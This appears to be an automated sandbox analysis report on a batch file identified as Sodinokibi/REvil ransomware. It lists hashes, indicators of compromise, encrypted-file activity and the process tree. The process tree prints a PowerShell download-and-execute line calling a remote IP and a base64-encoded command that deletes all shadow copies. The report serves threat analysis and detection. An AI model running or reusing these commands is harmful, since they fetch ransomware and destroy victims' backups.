Analysis
-
max time kernel
143s -
max time network
137s -
platform
windows7_x64 -
resource
win7v200217 -
submitted
21-02-2020 16:10
Static task
static1
Behavioral task
behavioral1
Sample
Qqgre83T.bat
Resource
win7v200217
Behavioral task
behavioral2
Sample
Qqgre83T.bat
Resource
win10v200217
General
-
Target
Qqgre83T.bat
-
Size
197B
-
MD5
23fb28ede9070f21977214722b7b46fe
-
SHA1
f81fbe696a0abdcf0e314125ed1aaf8779feff0d
-
SHA256
552e2dd699f7eb32c4ce0dc9dd35616b783cdf3fcb391b01b0422e2ad98a8a45
-
SHA512
dcd01869d9bd74264aba08b5c66f7a94b3c5513f0e713fdd3d596e1ed6cb43582c184d39ca9f78a6d23814a96535a5ef294f97c42594e10b7546d38e2f0cc4ac
Malware Config
Extracted
http://185.103.242.78/pastes/Qqgre83T
Extracted
C:\rnmbv-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/8CF4F644E288F198
http://decryptor.cc/8CF4F644E288F198
Signatures
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1828 wrote to memory of 1852 1828 cmd.exe powershell.exe PID 1852 wrote to memory of 1964 1852 powershell.exe powershell.exe PID 1852 wrote to memory of 1964 1852 powershell.exe powershell.exe PID 1852 wrote to memory of 1964 1852 powershell.exe powershell.exe PID 1852 wrote to memory of 1964 1852 powershell.exe powershell.exe -
Blacklisted process makes network request 71 IoCs
Processes:
powershell.exeflow pid process 3 1852 powershell.exe 5 1852 powershell.exe 6 1852 powershell.exe 8 1852 powershell.exe 10 1852 powershell.exe 12 1852 powershell.exe 13 1852 powershell.exe 15 1852 powershell.exe 17 1852 powershell.exe 18 1852 powershell.exe 20 1852 powershell.exe 21 1852 powershell.exe 23 1852 powershell.exe 24 1852 powershell.exe 26 1852 powershell.exe 28 1852 powershell.exe 30 1852 powershell.exe 33 1852 powershell.exe 34 1852 powershell.exe 36 1852 powershell.exe 38 1852 powershell.exe 40 1852 powershell.exe 42 1852 powershell.exe 44 1852 powershell.exe 46 1852 powershell.exe 48 1852 powershell.exe 50 1852 powershell.exe 52 1852 powershell.exe 53 1852 powershell.exe 55 1852 powershell.exe 57 1852 powershell.exe 59 1852 powershell.exe 63 1852 powershell.exe 64 1852 powershell.exe 66 1852 powershell.exe 68 1852 powershell.exe 70 1852 powershell.exe 71 1852 powershell.exe 73 1852 powershell.exe 76 1852 powershell.exe 78 1852 powershell.exe 80 1852 powershell.exe 81 1852 powershell.exe 83 1852 powershell.exe 85 1852 powershell.exe 87 1852 powershell.exe 88 1852 powershell.exe 89 1852 powershell.exe 90 1852 powershell.exe 92 1852 powershell.exe 98 1852 powershell.exe 100 1852 powershell.exe 102 1852 powershell.exe 104 1852 powershell.exe 105 1852 powershell.exe 107 1852 powershell.exe 109 1852 powershell.exe 110 1852 powershell.exe 112 1852 powershell.exe 113 1852 powershell.exe 115 1852 powershell.exe 117 1852 powershell.exe 118 1852 powershell.exe 120 1852 powershell.exe -
Discovering connected drives 3 TTPs 7 IoCs
Processes:
powershell.exepowershell.execmd.exedescription ioc process File opened (read-only) \??\F: powershell.exe File opened (read-only) \??\C: powershell.exe File opened (read-only) \??\C: powershell.exe File opened (read-only) \??\A: powershell.exe File opened (read-only) \??\B: powershell.exe File opened (read-only) \??\E: powershell.exe File opened (read-only) \??\C: cmd.exe -
Drops file in Program Files directory 47 IoCs
Processes:
powershell.exedescription ioc process File renamed C:\Program Files\ExpandProtect.ods => \??\c:\program files\ExpandProtect.ods.rnmbv powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\rnmbv-readme.txt powershell.exe File opened for modification \??\c:\program files\microsoft sql server compact edition\v3.5\sqlcese35.dll powershell.exe File opened for modification \??\c:\program files\ConvertToFormat.ini powershell.exe File created \??\c:\program files\microsoft sql server compact edition\rnmbv-readme.txt powershell.exe File opened for modification \??\c:\program files\microsoft sql server compact edition\v3.5\sqlcecompact35.dll powershell.exe File renamed C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\sqlcecompact35.dll => \??\c:\program files\microsoft sql server compact edition\v3.5\sqlcecompact35.dll.rnmbv powershell.exe File opened for modification \??\c:\program files\microsoft sql server compact edition\v3.5\sqlceer35EN.dll powershell.exe File renamed C:\Program Files\ConvertToFormat.ini => \??\c:\program files\ConvertToFormat.ini.rnmbv powershell.exe File renamed C:\Program Files\SplitRestart.bmp => \??\c:\program files\SplitRestart.bmp.rnmbv powershell.exe File opened for modification \??\c:\program files\ExpandProtect.ods powershell.exe File renamed C:\Program Files\DisableCopy.M2T => \??\c:\program files\DisableCopy.M2T.rnmbv powershell.exe File opened for modification \??\c:\program files\LockBackup.au powershell.exe File renamed C:\Program Files\LockBackup.au => \??\c:\program files\LockBackup.au.rnmbv powershell.exe File opened for modification \??\c:\program files\MoveWait.tif powershell.exe File renamed C:\Program Files\GrantOpen.inf => \??\c:\program files\GrantOpen.inf.rnmbv powershell.exe File renamed C:\Program Files\MoveWait.tif => \??\c:\program files\MoveWait.tif.rnmbv powershell.exe File opened for modification \??\c:\program files\SkipApprove.xhtml powershell.exe File opened for modification \??\c:\program files\DisableCopy.M2T powershell.exe File renamed C:\Program Files\RestartSave.xltm => \??\c:\program files\RestartSave.xltm.rnmbv powershell.exe File opened for modification \??\c:\program files\UnpublishSync.aifc powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\rnmbv-readme.txt powershell.exe File opened for modification \??\c:\program files\microsoft sql server compact edition\v3.5\sqlceca35.dll powershell.exe File renamed C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\sqlceca35.dll => \??\c:\program files\microsoft sql server compact edition\v3.5\sqlceca35.dll.rnmbv powershell.exe File renamed C:\Program Files\SkipApprove.xhtml => \??\c:\program files\SkipApprove.xhtml.rnmbv powershell.exe File opened for modification \??\c:\program files\RestartUninstall.midi powershell.exe File renamed C:\Program Files\UnpublishSync.aifc => \??\c:\program files\UnpublishSync.aifc.rnmbv powershell.exe File renamed C:\Program Files\UnpublishConvertTo.rmi => \??\c:\program files\UnpublishConvertTo.rmi.rnmbv powershell.exe File opened for modification \??\c:\program files\microsoft sql server compact edition\v3.5\sqlceqp35.dll powershell.exe File opened for modification \??\c:\program files\EditRepair.mpv2 powershell.exe File renamed C:\Program Files\EditRepair.mpv2 => \??\c:\program files\EditRepair.mpv2.rnmbv powershell.exe File opened for modification \??\c:\program files\SuspendGrant.m4a powershell.exe File renamed C:\Program Files\SuspendGrant.m4a => \??\c:\program files\SuspendGrant.m4a.rnmbv powershell.exe File opened for modification \??\c:\program files\microsoft sql server compact edition\v3.5\sqlceme35.dll powershell.exe File renamed C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\sqlceme35.dll => \??\c:\program files\microsoft sql server compact edition\v3.5\sqlceme35.dll.rnmbv powershell.exe File renamed C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\sqlceer35EN.dll => \??\c:\program files\microsoft sql server compact edition\v3.5\sqlceer35EN.dll.rnmbv powershell.exe File created \??\c:\program files (x86)\rnmbv-readme.txt powershell.exe File opened for modification \??\c:\program files\RestartSave.xltm powershell.exe File opened for modification \??\c:\program files\SplitRestart.bmp powershell.exe File opened for modification \??\c:\program files\UnpublishConvertTo.rmi powershell.exe File renamed C:\Program Files\RestartUninstall.midi => \??\c:\program files\RestartUninstall.midi.rnmbv powershell.exe File opened for modification \??\c:\program files\microsoft sql server compact edition\v3.5\sqlceoledb35.dll powershell.exe File renamed C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\sqlceoledb35.dll => \??\c:\program files\microsoft sql server compact edition\v3.5\sqlceoledb35.dll.rnmbv powershell.exe File opened for modification \??\c:\program files\GrantOpen.inf powershell.exe File renamed C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\sqlcese35.dll => \??\c:\program files\microsoft sql server compact edition\v3.5\sqlcese35.dll.rnmbv powershell.exe File renamed C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\sqlceqp35.dll => \??\c:\program files\microsoft sql server compact edition\v3.5\sqlceqp35.dll.rnmbv powershell.exe File created \??\c:\program files\rnmbv-readme.txt powershell.exe -
Drops startup file 1 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\users\admin\appdata\roaming\microsoft\word\startup\rnmbv-readme.txt powershell.exe -
Processes:
powershell.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b1900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd90b000000010000001200000044006900670069004300650072007400000014000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd155090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703082000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1852 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1852 powershell.exe 1852 powershell.exe 1852 powershell.exe 1964 powershell.exe 1964 powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\nz8a157m.bmp" powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1852 powershell.exe Token: SeDebugPrivilege 1852 powershell.exe Token: SeDebugPrivilege 1964 powershell.exe Token: SeBackupPrivilege 1356 vssvc.exe Token: SeRestorePrivilege 1356 vssvc.exe Token: SeAuditPrivilege 1356 vssvc.exe -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
powershell.exepid process 1852 powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Qqgre83T.bat"1⤵
- Suspicious use of WriteProcessMemory
- Discovering connected drives
PID:1828 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Qqgre83T');Invoke-YKWELITCAXKXYN;Start-Sleep -s 10000"2⤵
- Suspicious use of WriteProcessMemory
- Blacklisted process makes network request
- Discovering connected drives
- Drops file in Program Files directory
- Drops startup file
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Sets desktop wallpaper using registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: RenamesItself
- Drops file in System32 directory
PID:1852 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Discovering connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1964
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1356